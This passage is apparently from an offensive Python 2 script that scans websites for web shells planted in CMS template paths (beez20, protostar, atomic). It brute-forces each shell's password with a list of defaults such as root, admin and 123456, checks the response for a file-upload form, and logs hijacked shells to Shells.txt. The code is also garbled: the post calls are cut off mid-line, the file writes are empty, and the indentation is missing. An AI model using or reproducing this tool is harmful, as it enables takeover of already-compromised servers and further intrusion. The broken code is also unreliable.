if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH17_J_content = requests.get(SH17_J,timeout=15).content
if ' type="file"' in SH17_J_content or ' type=\'file\'' in SH17_J_content or ' type= "file"' in SH17_J_content or ' type= \'file\'' in SH17_J_content or ' type = "file"' in SH17_J_content or ' type = \'file\'' in SH17_J_content or ' type ="file"' in SH17_J_content or ' type =\'file\'' in SH17_J_content or ' type=file' in SH17_J_content or ' type =file' in SH17_J_content or ' type= file' in SH17_J_content or ' type = file' in SH17_J_content or 'Upload</a> ]</li><li>[' in SH17_J_content or 'upload</a><li><a>Sym' in SH17_J_content :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH17_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[beez20]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH18_J_content = requests.get(SH18_J,timeout=15).content
if ' type="file"' in SH18_J_content or ' type=\'file\'' in SH18_J_content or ' type= "file"' in SH18_J_content or ' type= \'file\'' in SH18_J_content or ' type = "file"' in SH18_J_content or ' type = \'file\'' in SH18_J_content or ' type ="file"' in SH18_J_content or ' type =\'file\'' in SH18_J_content or ' type=file' in SH18_J_content or ' type =file' in SH18_J_content or ' type= file' in SH18_J_content or ' type = file' in SH18_J_content or 'Upload</a> ]</li><li>[' in SH18_J_content or 'upload</a><li><a>Sym' in SH18_J_content :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH18_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH19_J_content = requests.get(SH19_J,timeout=15).content
if ' type="file"' in SH19_J_content or ' type=\'file\'' in SH19_J_content or ' type= "file"' in SH19_J_content or ' type= \'file\'' in SH19_J_content or ' type = "file"' in SH19_J_content or ' type = \'file\'' in SH19_J_content or ' type ="file"' in SH19_J_content or ' type =\'file\'' in SH19_J_content or ' type=file' in SH19_J_content or ' type =file' in SH19_J_content or ' type= file' in SH19_J_content or ' type = file' in SH19_J_content or 'Upload</a> ]</li><li>[' in SH19_J_content or 'upload</a><li><a>Sym' in SH19_J_content :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH19_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[protostar]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
SH20_J_content = requests.get(SH20_J,timeout=15).content
if ' type="file"' in SH20_J_content or ' type=\'file\'' in SH20_J_content or ' type= "file"' in SH20_J_content or ' type= \'file\'' in SH20_J_content or ' type = "file"' in SH20_J_content or ' type = \'file\'' in SH20_J_content or ' type ="file"' in SH20_J_content or ' type =\'file\'' in SH20_J_content or ' type=file' in SH20_J_content or ' type =file' in SH20_J_content or ' type= file' in SH20_J_content or ' type = file' in SH20_J_content or 'Upload</a> ]</li><li>[' in SH20_J_content or 'upload</a><li><a>Sym' in SH20_J_content :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH20_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[atomic]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
